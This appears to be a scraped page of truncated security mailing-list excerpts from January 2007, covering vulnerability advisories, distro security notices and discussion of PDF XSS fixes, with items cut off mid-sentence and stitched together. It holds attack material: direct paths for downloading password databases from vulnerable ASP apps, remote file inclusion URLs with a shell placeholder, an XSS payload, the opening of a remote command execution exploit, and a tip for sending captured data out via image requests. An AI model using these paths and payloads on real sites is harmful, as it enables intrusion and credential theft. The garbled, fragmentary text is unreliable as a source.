Hi,
I checked the code of 2.0 and 2.0.1 and tested it. There is no risk of Code
Injection.
If you are still unsure mail me.
I'd like to announce the availability of a free security reconnaissance /
firewall bypassing tool called 0trace. This tool enables the user to
perform hop enumeration (traceroute) within an established TCP
connection, such as a HTTP or SMTP session. This is opposed to sending
stray packets, as
On Sun, 7 Jan 2007, Michal Zalewski wrote:
[ Of course, I might be wrong, but Google seems to agree with my
assessment. A related use of this idea is 'firewalk' by Schiffman and
Goldsmith, a tool to probe firewall ACLs; another utility called
'tcptraceroute' by Michael C. Toren
#!/usr/bin/php
?php
/**
* This file require the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from acid-root.new.fr.
**/
require(phpsploitclass.php);
/*/
|
| header @lex Guestbook = 4.0.2 Remote Command Execution Exploit
| header
AJLogin v3.5 Remote Password Disclosure Vulnerability
#Software: AJLogin
#Version: 3.5
#Download: http://www.randomravings.com/ajasp/dload.asp?file=4
#Found by: beks
#Risk: Medium
#http://[target]/[AJLogin_Path]/ajlogin.mdb
EMembersPro 1.0 Remote Password Disclosure Vulnerability
#Software: EMembersPro
#Version: 1.0
#Download: http://www.keyvan1.com/package/member.zip
#Found by: beks
#Risk: Medium
#http://[target]/[EMembersPro_Path]/users.mdb
MitiSoft Remote Password Disclosure Vulnerability
#Software: MitiSoft
#Download: http://aspindir.com/indir.asp?id=4536
#Found by: beks
#Risk: Medium
#http://[target]/[MitiSoft_Path]/access_MS/MitiSoft.mdb
HarikaOnline v2.0 Remote Password Disclosure Vulnerability
#Software: HarikaOnline
#Version: 2.0
#Download: http://aspindir.com/indir.asp?id=4563
#Found by: beks
#Risk: Medium
#http://[target]/[harikaonline_Path]/harikaonline.mdb
Webulas Remote Password Disclosure Vulnerability
#Software: Webulas
#Download: http://aspindir.com/indir.asp?id=4516
#Found by: beks
#Risk: Medium
#http://[target]/[Webulas_Path]/db/db.mdb
Uguestbook Remote Password Disclosure Vulnerability
#Software: Uguestbook
#Version: 1.0
#Download: http://www.uapplication.com/download/Uguestbook%20-%201.0.zip
#Found by: beks
#Risk: Medium
#http://[target]/[Uguestbook_Path]/mdb-database/guestbook.mdb
---
NUNE News Script (custom_admin_path) Remote File Include Vulnerablity
---
Author: xoron
---
Code:
if (isset($custom_admin_path))
$special_admin_path =
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1245-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
January 7th, 2006
James Landis wrote:
More notes on Amit's remediation algorithm:
Putting all of the identifying information into the token weakens the
defense because the attacker can mount known plaintext attacks against
it.
Not precisely. First, the classic definition of known plaintext
attacks is that an
# BhhGroup.Org Bilgi-Yonetimi.Org.Tr
# script name : Dayfox Blog
# Script Download : http://hotscripts.com/Detailed/66344.html
# Risk : High
# Found By : ShaFuck31
# Vulnerable file : index.php
#Vuln :
http://www.victim.com/ScriptPath/index.php?page=[sheLL]
On Thu, Jan 04, 2007 at 08:03:34PM +0100, Ben Bucksch wrote:
[...]
= Proposed fix =
The problem at hand could be easily fixed by letting the client check
out only in the current directory (or one specified by the user on the
commandline or GUI, preferences stored locally), no matter what
# BhhGroup.Org Bilgi-Yonetimi.Org.Tr
# script name : GeoBB Georgian Bulletin Board
# Script Download : http://hotscripts.com/Detailed/58100.html
# Risk : High
# Found By : ShaFuck31
# Vulnerable file : index.php
Vuln. Code:
require($action.'.php');
#Vuln :
Thor,
On 2007-01-05 Thor (Hammer of God) wrote:
You guys might want to put that on your web site. Probably somewhere
under Contact Us so that it is easy to, um, contact you specifically
for security issues.
[...]
Something like [EMAIL PROTECTED] may seem obvious, but it's better if
you list
TK53 Advisory #1 01/07/2007
- CenterICQ remote DoS buffer overflow in Livejournal handling
* Authors: Lolek of TK53 [EMAIL
This also works for the affected versions of Opera mentioned elsewhere
on the list (9.10, 8.54)...
-Original Message-
From: Martin O'Neal [mailto:[EMAIL PROTECTED]
Sent: 04 January 2007 17:59
To: bugtraq@securityfocus.com; [EMAIL PROTECTED]
Subject: RE: [WEB SECURITY] Universal XSS with
MkPortal Full Path Disclosure
Vulnerability discovered by: Demential
Web: http://headburn.altervista.org
E-mail: info[at]burnhead[dot]it
Mkportal website: http://www.mkportal.it
Tested on MKPortal M1.1 RC1 with PhpBB
other versions may also be affected.
A correction to my previous post: since THE_REQUEST looks like GET
/foo/bar/baz.pdf HTTP/1.0, the regex used needs to match the space between
pdf and HTTP, so this mod works better:
RewriteCond %{THE_REQUEST} .*\.pdf[^\wA-Za-z0-9._?%-]
Again, YMMV depending on what characters you expect to be
HP Multiple Products PML Driver Local Privilege Escalation
By Sowhat of Nevis Labs
2007.01.08
http://www.nevisnetworks.com
http://secway.org/advisory/AD20070108.txt
Vendor
Hewlett-Packard
Products Affected
HP All-In-One products
HP PSC 700 series
HP PSC 900 series
HP PSC 1100 series
HP PSC
# magic photo storage website Remote File Inclusion
# Vendor: http://www.scriptaty.net/magic-photo-storage-website.html
# Demo Site : http://www.turnkeydemos.info/demo/picstorage/
# Found By : k1tk4t -
I've Just released an article about how the Quality Assurance phase of the
development
cycle can incorporate security testing into a standard test plan, and make it
part
of the regular testing cycle.
Writing Software Security Test Cases: Putting security test cases into your
test plan
Product: Packeteer PacketShaper
Model: 9500/ISP
Software: PacketWise 8.x (possibly others)
===
Background
===
Packeteer creates bandwidth management solutions such as the PacketShaper which
is the ultimate scalable platform for optimized WAN application
performancethe only
I just skimmed through your code very quickly and I noticed a single
problem. Don't send the captured data with another XHR (xhr2). Use
images.
var img = new Image()
img.src = url;
this should work.
On 1/4/07, T Biehn [EMAIL PROTECTED] wrote:
I'm trying to put together a demonstration of this
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1246-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
January 8th, 2007
also, you can use TinyURL to hide entire attack vectors. For example,
the following link contains a harmless exploit (alert message box) for
Google:
http://tinyurl.com/t8h4q
more about this issue here:
http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/
On 1/4/07, Billy Hoffman [EMAIL
rPath Security Advisory: 2007-0001-1
Published: 2007-01-08
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
openoffice.org=/[EMAIL PROTECTED]:devel//1/2.0.3-1.7-1
References:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
-
Debian Security Advisory DSA-1247-1[EMAIL PROTECTED]
http://www.debian.org/security/ Noah Meyerhans
January 08, 2007
-
Interesting but yet I don't any possiblity of an attack.
URL like
http://host/?user=xdfaerror=%3Cscript%3Ealert('hakin9')%3C/script%3E
is generated when user login failed and JES webmail server issued an HTTP
redirect
The webmail server itself will not issue URL like that unless the proxy
hello list,
the cisco network admission control system gives an adminitrator the
chance to check the clients, whether they have installed certain
patches / hotfixes. this check is not reliable.
programm version: cisco trust agent 2.0.1.14 (probably all versions)
os: windows xp sp2
vendor
One possible work around on the server side:
Direct your web server to serve .pdf files as mime type
application/octet That way the files will be saved to
disk instead of opening in the browser plug in.
Firefox works fine with this, but depending upon which version of IE you
have (and
RSnake wrote:
The point is - someone with shared IP is vulnerable ONLY to an
attacker with the same IP. Which makes attacks much less generic and
much more painful. Rock solid it ain't, but I think it's a pretty
good band-aid until all (hmmm...) clients upgrade to Acrobat Reader 8.0.
-Amit
createauction (catid) Remote SQL Injection Vulnerability
HItamputih Crew
# hitamputih Advisory
# Discovered By : IbnuSina
#---
# Software: createauction
# Vendor :
thorben schroeder wrote:
the cisco network admission control system gives an adminitrator the
chance to check the clients, whether they have installed certain
patches / hotfixes. this check is not reliable.
This is a known vulnerability of any system of NAC which trusts a client
GForge Cross Site Scripting vulnerability
Version:Tested on GForge 4.5.11
Discovered by: José Ramón Palanco: jose.palanco(at)eazel(dot)es
http://www.eazel.es
Description:
GForge is vulnerable to a security vulnerability that allow Cross-Site
Scripting attacks. Due to improper
I'm quite confident that someone could develop a very secure
interpreted language.
Thats a moot point, it's not about languages anymore, it's about
FRAMEWORKS on top of languages with security baked in.
In Java my team has one validation servlet that every request must go through
- so even if
: We frequently see requests for contact on this mailing list. Readers
: are encouraged to ensure that their software vendors are aware of the
: following documents, which have more specific guidelines for vendors to
: establish. Because these documents have been co-authored by major
:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2007:003
http://www.mandriva.com/security/
Updates:
1. In private communication, Tom Spector observed that the cookie
doesn't add any significant security. In retrospect, I could have
omitted it completely. It's there as a remnant of a previous idea I had.
In other words, I see nothing wrong with the following, simpler and more
2. While thinking more about this solution, I observed that if the attacker
can have an agent sharing the same IP address with the victim (by agent I
mean an entity that can communicate with the target web site and read back
its response data), then the algorithms I suggested will not be
RSnake wrote:
2. While thinking more about this solution, I observed that if the
attacker can have an agent sharing the same IP address with the
victim (by agent I mean an entity that can communicate with the
target web site and read back its response data), then the algorithms
I suggested
The point is - someone with shared IP is vulnerable ONLY to an attacker with
the same IP. Which makes attacks much less generic and much more painful.
Rock solid it ain't, but I think it's a pretty good band-aid until all
(hmmm...) clients upgrade to Acrobat Reader 8.0.
-Amit
Sorry for
Good day
Direct Link to Advisory
http://homepage.mac.com/adonismac/Advisory/steg/steganography.html
Affected Product
Steganography 1.7.1 and 1.8 (latest). http://www.securekit.com/hidefiles.htm
Bug Type and Date
=
Type: Bad Design
Date: 01/06/2007
Bug Results
On Wed, 3 Jan 2007, William A. Rowe, Jr. wrote:
Michal Zalewski wrote:
I feel silly for reporting this, but I couldn't help but notice that
Apache and IIS both have a bizarro implementation of HTTP/1.1 Range
header functionality (as defined by RFC 2616). Their implementations allow
the
i tried this with IE7 on Vista Ultimate, 45mins later and its still working as
expected.
However I do get a javascript error: (Sorry had to retype it out)
Line: 0
Char: 0
Error: The following tags where not closed: foo, foo, foo, foo, foo, foo, foo,
foo, foo, foo, foo, foo, foo, foo, foo, foo,
Le vendredi 05 janvier 2007, Thor (Hammer of God) a écrit :
Something like [EMAIL PROTECTED] may seem obvious, but it's better if you
list specific contact info so it can be easily found.
I don't want to be rude but :
- [EMAIL PROTECTED] is the only standardized security contact (as
defined by
Dear All,
lfgnd La Fonera routers distributed by FON allow web access to
lfgnd unauthenticated users via DNS tunneling.
Have been in a Hotel recently? I think actually we should post those
that are NOT vulnerable to this rather then post those who are. Pun
intended.
--
http://secdev.zoller.lu
Folks,
Over the Christmas break I did quite a bit of work on the code and have
added a hardware abstraction layer that allows support for readers other
than the ACG, and to test it I've added limited support for the Frosch
Hitag reader.
New features in this release:
Program Hitag2 to
to kill is enough not to finish the request and let it timeout on server side.
no ddos/dos protection layers can stand against this attack (as far as i know)
and the scenario is simple
1. fingerprint the timeout on serverside
2. dig the sitemap from target
3. build a list of browsers to
Another similar option is to use a single-use random value (not
encrypted), that gets invalidated after it's served back.
You can save the random value on the (non persistent) session
(server-side), and serve the PDF only if the correct random value is
provided.
Once a random value has been
Guy Podjarny wrote:
Another similar option is to use a single-use random value (not
encrypted), that gets invalidated after it's served back.
You can save the random value on the (non persistent) session
(server-side), and serve the PDF only if the correct random value is
provided.
Once a
53 matches
Mail list logo